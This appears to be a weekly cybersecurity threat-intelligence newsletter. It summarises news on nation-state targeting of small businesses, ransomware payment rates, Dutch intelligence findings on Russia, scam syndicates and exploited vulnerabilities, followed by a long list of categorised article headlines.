Nation-State Threats Put SMBs in Their Sights
Nation-state cyber threat groups are increasingly targeting small and medium-sized businesses (SMBs), particularly those linked to larger organisations. Broadcom warns that most nation-state attacks now impact the private sector and midmarket firms, with identity providers among common targets. Many SMBs remain unaware of their role in the broader supply chain, making them attractive entry points. Nation-state actors are also seen moonlighting, switching between espionage and financially motivated cyber attacks. Experts stress that SMBs must strengthen their cyber defences, as they face the same sophisticated threats once reserved for larger enterprises.
Global Firms Succumb to Ransomware: 86% Pay Up Despite Having Advanced Backup Tools
Rubrik’s latest research shows that 86% of global organisations paid ransom demands last year, despite having access to advanced backup tools. The report highlights that 74% of firms experienced partial compromise of their backup systems, with 35% suffering complete compromise, often due to attackers disabling recovery infrastructure before encrypting data. Nearly 80% of breaches were driven by stolen identities, particularly exploiting legacy systems like Active Directory. Average ransom payments globally are around $479,000. The findings stress that true resilience requires not just technology, but operational readiness and leadership commitment to recovery preparedness.
Dutch Intelligence Report: Russia’s Sabotage in Europe Borders on State Terrorism
The Dutch Intelligence services (AIVD) have reported a sharp rise in Russian aggression across Europe in 2024, including espionage, cyber attacks, and disinformation campaigns described as bordering on state terrorism. A Dutch public facility was targeted by Russian hackers, and overall national threats increased, with 73 official reports issued - up from 56 in 2023. The report also flagged escalating extremist threats, including right-wing and jihadist violence, some involving very young individuals. China was identified as another major threat, targeting Dutch military research and supplying military goods to Russia. The AIVD warned that international conflicts are increasingly fuelling domestic instability.
Cyber Crime Syndicates Expand Beyond Southeast Asia, UN Warns of Global Threat
The United Nations has warned that cybercrime syndicates originating in Southeast Asia are now operating on a global scale, generating billions in scam profits each year. Despite law enforcement crackdowns, these groups have expanded into Africa, South America, and South Asia, moving operations to regions with weak governance. The UN reports that these networks use online platforms and cryptocurrency to scale operations, targeting victims in over 50 countries. In 2023 alone, the US reported losses of over $5.6 billion to cryptocurrency scams. Without international collaboration, the scale and impact of cyber fraud will continue to escalate.
159 Vulnerabilities Exploited in Q1 2025 — 28% Within 24 Hours of Disclosure
VulnCheck has reported that 159 vulnerabilities were exploited in the first quarter of 2025, with 28% targeted within one day of disclosure. The most affected systems were content management platforms, network edge devices and operating systems, with Microsoft Windows, Broadcom VMware and TOTOLINK routers among the most impacted products. Separately, Verizon’s 2025 Data Breach Investigations Report noted a 34% rise in breaches initiated through vulnerability exploitation, which now accounts for 20% of all breaches.
Sources:
https://www.techradar.com/pro/security/cybersecurity-is-now-critical-for-business-growth-ceos-say
https://www.helpnetsecurity.com/2025/04/21/businesses-fraud-consequence/
https://www.cityam.com/ms-shares-at-ftse-100-retailer-fall-as-cyber-attack-hits-customers/
https://www.infosecurity-magazine.com/news/verizon-dbir-smb-ransomware-attacks/
https://www.darkreading.com/threat-intelligence/nation-state-threats-smb
https://thehackernews.com/2025/04/159-cves-exploited-in-q1-2025-283.html
Governance, Risk and Compliance
66% of CISOs are worried cyber security threats surpass their defenses | Security Magazine
The Role of Threat Intelligence in Proactive Defense
Compliance weighs heavily on security and GRC teams - Help Net Security
Cyber threats now a daily reality for one in three businesses - Help Net Security
Cyber security is now critical for business growth, CEOs say | TechRadar
Cybersecurity Metrics That Matter for Board-Level Reporting
Cybersecurity Controls: What Do Regulators Expect Nowadays? | Alston & Bird - JDSupra
Why CISOs and CTOs Must Collaborate More Than Ever in Today’s Security Landscape
Nine of 10 global firms hit by cyber attacks – report | Insurance Business America
Exclusive: Small businesses under-prepared amid restructuring push
Businesses Failing to Prevent Cyber Attacks, Says Report
The C-suite gap that's putting your company at risk - Help Net Security
Veeam Report Finds Close to 70% of Organizations Still Under Cyber-Attack Despite Improved Defenses
Enterprises change how they manage cyber risk
From Reactive to Predictive - The Next Frontier for Security Leaders
Staying Ahead of Cyber Threats with Cyber Resilience | Dell USA
Beyond Compliance - How VPs of Security Drive Strategic Cybersecurity Initiatives
Not if, but when -- Why every organization needs a cyber resilience strategy
Threats
Ransomware, Extortion and Destructive Attacks
Verizon discovers spike in ransomware and exploited vulnerabilities | CyberScoop
Ransomware, espionage and data breaches? Yep – Verizon just dropped a 117-page thriller - PhoneArena
Verizon DBIR: Small Businesses Bearing the Brunt of Ransomware Attacks - Infosecurity Magazine
Could Ransomware Survive Without Cryptocurrency?
Ransomware Gangs Innovate With New Affiliate Models
Global firms succumb to ransomware: 86% pay up despite having advanced backup tools | CSO Online
The Ransomware Business Model: The State of Cyber Crime | Silicon UK Tech News
Ransomware activity trends | Professional Security Magazine
Interlock ransomware gang pushes fake IT tools in ClickFix attacks
Teach young people about ransomware risks before they enter work, expert urges | The Standard
Credential theft outpaces ransomware as cyber threat landscape evolves, report claims
Ransomware Gang Takes Page From Elon's 'What Did You Do This Week' DOGE Emails
Ransomware the most pervasive threat to US critical infrastructure in 2024, says FBI | CSO Online
Emulating the Hellish Helldown Ransomware - Security Boulevard
What is Ransomware? Definition and Complete Guide | Informa TechTarget
Ransomware Victims
Ransomware Gang Claims Attack On Manchester Credit Union
3 More Healthcare Orgs Hit by Ransomware Attacks
Interlock ransomware claims DaVita attack, leaks stolen data
M&S takes systems offline as 'cyber incident' lingers • The Register (unconfirmed)
Money blog: M&S forced to stop taking online orders amid payment meltdown | Money News | Sky News (unconfirmed)
Phishing & Email Based Attacks
Emails delivering infostealers rose by 84% year-over-year | Security Magazine
The dark side of YouTube: Malicious links, phishing, and deepfakes - Help Net Security
Darcula Adds GenAI to Phishing Toolkit, Lowering the Barrier for Cybercriminals
Windows NTLM Hash Flaw Targeted in Global Phishing Attacks | MSSP Alert
Beware, hackers can apparently now send phishing emails from “no-reply@google.com” | TechRadar
Phishing for Codes: Russian Threat Actors Target Microsoft 365 OAuth Workflows | Volexity
Pope Francis’ Passing Triggers Surge Of Phishing, SEO Poisoning, And Fake Images
A new kind of phishing attack is fooling Gmail’s security. Here’s how it works | Laptop Mag
DPRK Hackers Steal $137M from TRON Users in Single-Day Phishing Attack
Cover-Up Culture? 95% of Phishing Attacks Go Unreported in Healthcare, New Paubox Report Reveals
Who needs phishing when your login's already in the wild? • The Register
Business Email Compromise (BEC)/Email Account Compromise (EAC)
FBI: Cybercrime cost victims 'staggering' $16.6B last year • The Register
Other Social Engineering
Cyber criminals blend AI and social engineering to bypass detection - Help Net Security
The dark side of YouTube: Malicious links, phishing, and deepfakes - Help Net Security
State-sponsored hackers embrace ClickFix social engineering tactic
'Elusive Comet' Attackers Use Zoom to Swindle Victims
Deepfake Impersonations: Your CEO’s Voice as a Threat Vector | MSSP Alert
State-sponsored actors spotted using ClickFix hacking tool developed by criminals | TechRadar
Pope Francis’ Passing Triggers Surge Of Phishing, SEO Poisoning, And Fake Images
North Korean Operatives Use Deepfakes in IT Job Interviews
Fraud, Scams and Financial Crime
FBI: Cyber Crime cost victims 'staggering' $16.6B last year • The Register
Deepfake Impersonations: Your CEO’s Voice as a Threat Vector | MSSP Alert
$40bn Southeast Asian Scam Sector Growing “Like a Cancer” - Infosecurity Magazine
Attackers, Defenders Lean on AI in Identity Fraud Battle
'Elusive Comet' Attackers Use Zoom to Swindle Victims
Japan’s FSA warns of unauthorized trades via stolen credentials from fake security firms' sites
WordPress ad-fraud plugins generated 1.4 billion ad requests per day
“Scallywag” Scheme Monetizing Piracy Through Browser Extensions
Pope Francis’ Passing Triggers Surge Of Phishing, SEO Poisoning, And Fake Images
Microsoft warns users about AI-Driven scams that target Quick Assist - gHacks Tech News
This Android malware drains cards with a single tap | Cybernews
UK Romance Scams Spike 20% as Online Dating Grows - Infosecurity Magazine
The Evolution of Cyber Crime: How to Stay Safe from AI-Driven Fraud | StoneTurn - JDSupra
Microsoft warns of AI-powered scam surge
The Cyber Criminals Who Organized a $243 Million Crypto Heist - The New York Times
Scammers Are Impersonating the FBI. Here's How To Spot Them - CNET
Artificial Intelligence
Cyber criminals blend AI and social engineering to bypass detection - Help Net Security
Darcula Adds GenAI to Phishing Toolkit, Lowering the Barrier for Cybercriminals
Bot Traffic Surpasses Humans Online—Driven by AI and Criminal Innovation - SecurityWeek
DeepSeek Breach Opens Floodgates to Dark Web
The AI market does not understand AI safety | TechTarget
Rethinking Resilience for the Age of AI-Driven Cyber Crime - Infosecurity Magazine
Attackers, Defenders Lean on AI in Identity Fraud Battle
Why CISOs are watching the GenAI supply chain shift closely - Help Net Security
Microsoft warns users about AI-Driven scams that target Quick Assist - gHacks Tech News
Identity is under siege as AI and cyber exploits evolve and outpace defenses | Biometric Update
The Evolution of Cyber Crime: How to Stay Safe from AI-Driven Fraud | StoneTurn - JDSupra
Microsoft warns of AI-powered scam surge
Slopsquatting: The worrying AI hallucination bug that could be spreading malware | Tom's Guide
The Shadow AI Surge: Study Finds 50% of Workers Use Unapproved AI Tools - SecurityWeek
Anthropic finds alarming 'emerging trends' in Claude misuse report | ZDNET
2FA/MFA
'SessionShark' ToolKit Evades Microsoft Office 365 MFA
Malware
Emails delivering infostealers rose by 84% year-over-year | Security Magazine
Russian Bulletproof Hosting Provider Proton66 Linked To Global Cyber Attack Surge
Hackers Abuse Russian Bulletproof Host Proton66 for Global Attacks and Malware Delivery
Chinese APT Mustang Panda Debuts 4 New Attack Tools
Multi-Stage Malware Attack Uses .JSE and PowerShell to Deploy Agent Tesla and XLoader
The dark side of YouTube: Malicious links, phishing, and deepfakes - Help Net Security
The Zoom attack you didn't see coming - Help Net Security
'Elusive Comet' Attackers Use Zoom to Swindle Victims
Slopsquatting: The worrying AI hallucination bug that could be spreading malware | Tom's Guide
Rootkit bypasses most Linux security detection | Cybernews
Linux io_uring PoC Rootkit Bypasses System Call-Based Threat Detection Tools
Chinese hackers target Russian govt with upgraded RAT malware
Iran-Linked Hackers Target Israel with MURKYTOUR Malware via Fake Job Campaign
Korean Telco Giant SK Telecom Hacked - SecurityWeek
Your cat’s microchip could carry malware | Cybernews
Bots/Botnets
Bot Traffic Surpasses Humans Online—Driven by AI and Criminal Innovation - SecurityWeek
Unmasking the Dead Internet: How bots and propaganda hijacked online discourse
Mobile
New Android malware steals your credit cards for NFC relay attacks
Leaking Apps: The Hidden Data Risks On Your Phone
New Android Warning — This TOAD Malware Attack Steals Cash From ATMs
Flexible working models fuel surge in device theft - Help Net Security
Russian army targeted by new Android malware hidden in mapping app
Denial of Service/DoS/DDoS
Dutch payment processor Adyen hit by three DDoS attacks | NL Times
Internet of Things – IoT
Opt out: how to protect your data and privacy if you own a Tesla | Tesla | The Guardian
Data Breaches/Leaks
Thousands of UK users of Vinted, Candy Crush and Tinder were hit in global hack
DeepSeek Breach Opens Floodgates to Dark Web
US Data Breach Victim Count Surges 26% Annually - Infosecurity Magazine
Data breach class action costs mount up | Computer Weekly
CISA Weighs In on Alleged Oracle Cloud Breach
3 More Healthcare Orgs Hit by Ransomware Attacks
5.5 Million Patients Affected by Data Breach at Yale New Haven Health - SecurityWeek
Blue Shield shared 4.7M people's health info with Google Ads • The Register
Hackers claim TikTok breach, 927,000 passwords might hit the internet | Cybernews
Korean Telco Giant SK Telecom Hacked - SecurityWeek
Organised Crime & Criminal Actors
Russian Bulletproof Hosting Provider Proton66 Linked To Global Cyberattack Surge
Cyber Crime Syndicates Expand Globally From Southeast Asia: UN
Hackers Abuse Russian Bulletproof Host Proton66 for Global Attacks and Malware Delivery
$40bn Southeast Asian Scam Sector Growing “Like a Cancer” - Infosecurity Magazine
Russian Infrastructure Plays Crucial Role in North Korean Cyber Crime Operations | Trend Micro (US)
Hacking groups are now increasingly in it for the money, not the chaos | TechRadar
When confusion becomes a weapon: How cyber criminals exploit economic turmoil - Help Net Security
The Evolution of Cyber Crime: How to Stay Safe from AI-Driven Fraud | StoneTurn - JDSupra
Microsoft warns of AI-powered scam surge
Scattered Spider Hacking Suspect Extradited to US From Spain
'Cyber crime ranks as No 1 risk in SA, overtaking long-standing issues': expert
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
More Than a Quarter of Bybit's Hacked Crypto Is Now Untraceable
Could Ransomware Survive Without Cryptocurrency?
The Cybercriminals Who Organized a $243 Million Crypto Heist - The New York Times
DPRK Hackers Steal $137M from TRON Users in Single-Day Phishing Attack
Web3, cryptocurrency sectors targeted by North Korean hackers | SC Media
North Korean cyber spies created U.S. firms to dupe crypto developers | Reuters
Insider Risk and Insider Threats
Teach young people about ransomware risks before they enter work, expert urges | The Standard
The Foundations of a Resilient Cyber Workforce
Supply Chain and Third Parties
Cyber attacks surged in 2025, with third party attacks seeing a huge rise | TechRadar
Security snafus caused by third parties up from 15% to 30% • The Register
Why CISOs are watching the GenAI supply chain shift closely - Help Net Security
Cloud/SaaS
Microsoft Purges Millions of Cloud Tenants After Storm-0558
Phishing for Codes: Russian Threat Actors Target Microsoft 365 OAuth Workflows | Volexity
Enterprises are facing a ‘cloud security crisis’ | IT Pro
Hackers abuse OAuth 2.0 workflows to hijack Microsoft 365 accounts
'SessionShark' ToolKit Evades Microsoft Office 365 MFA
Widespread Microsoft Entra lockouts tied to new security feature rollout
CISA Weighs In on Alleged Oracle Cloud Breach
Outages
Widespread Microsoft Entra lockouts tied to new security feature rollout
Wait, how did a decentralized service like Bluesky go down? | TechCrunch
Identity and Access Management
Identity is under siege as AI and cyber exploits evolve and outpace defenses | Biometric Update
Widespread Microsoft Entra lockouts tied to new security feature rollout
Encryption
Hackers Weaponizing Certificates & Stolen Private Keys to Infiltrate Organizations
New Android Warning — This TOAD Malware Attack Steals Cash From ATMs
Telegram vows to exit markets over encryption backdoor demands
Linux and Open Source
Open Source and Container Security Are Fundamentally Broken - The New Stack
Rootkit bypasses most Linux security detection | Cybernews
Linux io_uring PoC Rootkit Bypasses System Call-Based Threat Detection Tools
Passwords, Credential Stuffing & Brute Force Attacks
Credential theft outpaces ransomware as cyber threat landscape evolves, report claims
Vulnerability Exploitation and Credential Theft Now Top Initial Access - Infosecurity Magazine
Who needs phishing when your login's already in the wild? • The Register
7 Steps to Take After a Credential-Based cyberattack
Phishers Exploit Google Sites and DKIM Replay to Send Signed Emails, Steal Credentials
Social Media
The dark side of YouTube: Malicious links, phishing, and deepfakes - Help Net Security
Wait, how did a decentralized service like Bluesky go down? | TechCrunch
LinkedIn adds new verification tool to ensure security across the internet | TechRadar
Hackers claim TikTok breach, 927,000 passwords might hit the internet | Cybernews
Training, Education and Awareness
Teach young people about ransomware risks before they enter work, expert urges | The Standard
The Foundations of a Resilient Cyber Workforce
Regulations, Fines and Legislation
Compliance weighs heavily on security and GRC teams - Help Net Security
Cyber Security Controls: What Do Regulators Expect Nowadays? | Alston & Bird - JDSupra
Challenges persist as UK’s Cyber Security and Resilience Bill moves forward | Computer Weekly
Assessing The Impact Of The UK's Proposed Cyber Resilience Bill
EU Bolsters Cybersecurity With NIS2 Directive
Governance code of practice | Professional Security Magazine
The Wiretap: Trump’s Cyber Security Agency Avoided A Near Disaster
US cyber defences are being dismantled from the inside • The Register
Holyrood | Ofcom closes legal loophole that allowed criminals to track your location
Leasing of Global Titles banned | Professional Security Magazine
The splintering of a standard bug tracking system has begun • The Register
Why the MITRE CVE Database Scare Proves Multi-Source Vulnerability Intelligence Is Essential
Bill introduced to extend the Cybersecurity Information Sharing Act | Security Magazine
Two top cyber officials resign from CISA | The Record from Recorded Future News
2025 State Cybersecurity Legislation Focuses on Financial Services | Alston & Bird - JDSupra
Zambia's Updated Cyber Laws Prompt Surveillance Warnings
Top intelligence lawmaker fears China may exploit DOGE’s changes to government - Nextgov/FCW
Telegram vows to exit markets over encryption backdoor demands
Models, Frameworks and Standards
Assessing The Impact Of The UK's Proposed Cyber Resilience Bill
EU Bolsters Cybersecurity With NIS2 Directive
Governance code of practice | Professional Security Magazine
MITRE Launches New D3FEND CAD Tool to Create Precise Cybersecurity Scenarios
Mapping The Cyber Kill Chain Using Correlated Security Logs And Timeline Tools
Careers, Working in Cyber and Information Security
Switching to Cyber Security: Advice for Midcareer Professionals
Two ways AI hype is worsening the cyber security skills crisis | CSO Online
Cyber ‘agony aunts’ launch guidebook for women in security | Computer Weekly
Law Enforcement Action and Take Downs
Scattered Spider Hacking Suspect Extradited to US From Spain
Misinformation, Disinformation and Propaganda
Unmasking the Dead Internet: How bots and propaganda hijacked online discourse
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Ransomware, espionage and data breaches? Yep – Verizon just dropped a 117-page thriller - PhoneArena
Dutch intelligence report: Russia’s sabotage in Europe borders on state terrorism | NL Times
Cyber threats target F-35 in new era of military defense risks
The state of cyberwar in Ukraine — and how CISOs can help | CSO Online
Countries shore up digital defenses as tensions raise the threat of cyberwarfare - ABC News
Nation State Actors
Nation-State Threats Put SMBs in Their Sights
State-sponsored actors spotted using ClickFix hacking tool developed by criminals | TechRadar
China
Chinese APT Mustang Panda Debuts 4 New Attack Tools
How Chinese hacking got so good
Chinese Ghost Hackers Hit Hospitals And Factories In America And U.K.
Microsoft Purges Millions of Cloud Tenants After Storm-0558
Chinese hackers target Russian govt with upgraded RAT malware
Earth Kurma APT Campaign Targets Southeast Asian Government Telecom Sectors | Trend Micro (US)
DeepSeek Breach Opens Floodgates to Dark Web
Top intelligence lawmaker fears China may exploit DOGE’s changes to government - Nextgov/FCW
Russia
Dutch intelligence report: Russia’s sabotage in Europe borders on state terrorism | NL Times
State-sponsored hackers embrace ClickFix social engineering tactic
Russian Infrastructure Plays Crucial Role in North Korean Cybercrime Operations | Trend Micro (US)
Russia is ramping up hybrid attacks against Europe, Dutch intelligence says | Reuters
Phishing for Codes: Russian Threat Actors Target Microsoft 365 OAuth Workflows | Volexity
Dutch Warn of “Whole of Society” Russian Cyber-Threat - Infosecurity Magazine
The state of cyberwar in Ukraine — and how CISOs can help | CSO Online
Russia’s Arming For Space War I, Targeting SpaceX Satellite Systems
Chinese hackers target Russian govt with upgraded RAT malware
Russian Bulletproof Hosting Provider Proton66 Linked To Global Cyberattack Surge
Hackers Abuse Russian Bulletproof Host Proton66 for Global Attacks and Malware Delivery
Trojanized Alpine Quest app geolocates Russian soldiers • The Register
Russian army targeted by new Android malware hidden in mapping app
Iran
Iran-Linked Hackers Target Israel with MURKYTOUR Malware via Fake Job Campaign
Israel subjected to persistent targeting by Iranian hackers | SC Media
North Korea
Russian Infrastructure Plays Crucial Role in North Korean Cybercrime Operations | Trend Micro (US)
North Korean Operatives Use Deepfakes in IT Job Interviews
Kimsuky APT exploited BlueKeep RDP flaw in attacks against South Korea and Japan
More Than a Quarter of Bybit's Hacked Crypto Is Now Untraceable
DPRK Hackers Steal $137M from TRON Users in Single-Day Phishing Attack
Web3, cryptocurrency sectors targeted by North Korean hackers | SC Media
Lazarus hackers breach six companies in watering hole attacks
North Korean cyber spies created U.S. firms to dupe crypto developers | Reuters
Tools and Controls
66% of CISOs are worried cyber security threats surpass their defenses | Security Magazine
The Role of Threat Intelligence in Proactive Defense
Cyber security Controls: What Do Regulators Expect Nowadays? | Alston & Bird - JDSupra
Cyber security Metrics That Matter for Board-Level Reporting
Enterprises change how they manage cyber risk
What is Risk Exposure in Business? | Definitions from TechTarget
Phishers Exploit Google Sites and DKIM Replay to Send Signed Emails, Steal Credentials
Chinese APT Mustang Panda Debuts 4 New Attack Tools
Two ways AI hype is worsening the cyber security skills crisis | CSO Online
Rethinking Resilience for the Age of AI-Driven Cybercrime - Infosecurity Magazine
Open Source and Container Security Are Fundamentally Broken - The New Stack
Hackers Weaponizing Certificates & Stolen Private Keys to Infiltrate Organizations
Digital Forensics In 2025: How CSOs Can Lead Effective Investigations
Stronger Cloud Security in Five: How To Protect Your Cloud Workloads - Security Boulevard
Criminals target APIs as web attacks skyrocket globally | IT Pro
Widespread Microsoft Entra lockouts tied to new security feature rollout
7 Steps to Take After a Credential-Based cyberattack
The Foundations of a Resilient Cyber Workforce
From Reactive to Predictive - The Next Frontier for Security Leaders
5 Reasons Device Management Isn't Device Trust
Staying Ahead of Cyber Threats with Cyber Resilience | Dell USA
Not if, but when -- Why every organization needs a cyber resilience strategy
Traditional Networks Are Leaving Organizations Exposed
Coaching AI agents: Why your next security hire might be an algorithm - Help Net Security
Executives think AI can supercharge cyber security teams – analysts aren’t convinced | IT Pro
Exposure validation emerges as critical cyber defense component - Help Net Security
5 Major Concerns With Employees Using The Browser
Microsoft Claims Steady Progress Revamping Security Culture
Cyber Security Indicators: How IOCs, IOBs, and IOAs Empower Threat Detection and Prevention
Mapping The Cyber Kill Chain Using Correlated Security Logs And Timeline Tools
MITRE Launches New D3FEND CAD Tool to Create Precise Cybersecurity Scenarios
Reports Published in the Last Week
Other News
66% of CISOs are worried cybersecurity threats surpass their defenses | Security Magazine
Cyber threats now a daily reality for one in three businesses - Help Net Security
UK utility cyberattacks rose 586% from 2022 to 2023 | Security Magazine
Nine of 10 global firms hit by cyber attacks – report | Insurance Business America
Cyber in financial services study | Professional Security Magazine
The Biggest Security Risks With Public Wi-Fi | HuffPost Life
Verizon DBIR: Small Businesses Bearing the Brunt of Ransomware Attacks - Infosecurity Magazine
A new era of cyber threats is approaching for the energy sector - Help Net Security
New KnowBe4 Report Exposes Critical Cyber Threats in European Energy Sector
Why cyber security matters for small and medium-sized businesses – Computerworld
Exclusive: Small businesses under-prepared amid restructuring push
Adversary-in-the-Middle Attacks Persist – Strategies to Lessen the Impact - Security Boulevard
Two-thirds of cops find NATO summit in The Hague irresponsible | NL Times
Cyber threats escalate against energy sector | SC Media
Understanding 2024 cyber attack trends - Help Net Security
Microsoft Claims Steady Progress Revamping Security Culture
5 Most Common Security Attack Methods in 2024: Mandiant’s M-Trends Report
Cyber attacks Soar 47% Globally – Attacks On Education Increase By 73%
What school IT admins are up against, and how to help them win - Help Net Security
Cyber security in 2025- Real-World Threats and Lessons Learned
Is the automotive industry on the cusp of a cyber war? | Automotive World
Phishing Attacks Lead to Theft in the Shipping Industry | Manufacturing.net
Are maritime hackers pushing at an open door? - Ship Technology
Vulnerability Management
159 CVEs Exploited in Q1 2025 — 28.3% Within 24 Hours of Disclosure
Enterprises change how they manage cyber risk
Microsoft Security Vulnerabilities Set Record High in 2024: BeyondTrust
Vulnerability Exploitation and Credential Theft Now Top Initial Access - Infosecurity Magazine
Attackers hit security device defects hard in 2024 | CyberScoop
Businesses Failing to Prevent Cyber Attacks, Says Report
Verizon's DBIR Reveals 34% Jump in Vulnerability Exploitation - Infosecurity Magazine
The Wiretap: Trump’s Cyber Security Agency Avoided A Near Disaster
Open Source and Container Security Are Fundamentally Broken - The New Stack
The splintering of a standard bug tracking system has begun • The Register
Exposed and unaware: The state of enterprise security in 2025 - Help Net Security
Why the MITRE CVE Database Scare Proves Multi-Source Vulnerability Intelligence Is Essential
Vulnerabilities
Cisco Webex bug lets hackers gain code execution via meeting links
SonicWall SMA VPN devices targeted in attacks since January
Windows NTLM Hash Flaw Targeted in Global Phishing Attacks | MSSP Alert
Eight days from patch to exploitation for Microsoft flaw • The Register
Apple Zero Days Under 'Sophisticated Attack,' but Details Lacking
Rootkit bypasses most Linux security detection | Cybernews
Linux io_uring PoC Rootkit Bypasses System Call-Based Threat Detection Tools
Zyxel RCE Vulnerability Allows Arbitrary Query Execution Without any Authentication
Highest-Risk Security Flaw Found in Commvault Backup Solutions - Infosecurity Magazine
Critical Commvault RCE vulnerability fixed, PoC available (CVE-2025-34028) - Help Net Security
VulnCheck spotted 159 actively exploited vulnerabilities in first few months of 2025 | CyberScoop
TP-Link Router Vulnerabilities Let Attackers Inject Malicious SQL Commands
Patch Now: NVIDIA Flaws Expose AI Models, Critical Infrastructure
ASUS Confirms Critical Flaw in AiCloud Routers; Users Urged to Update Firmware
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.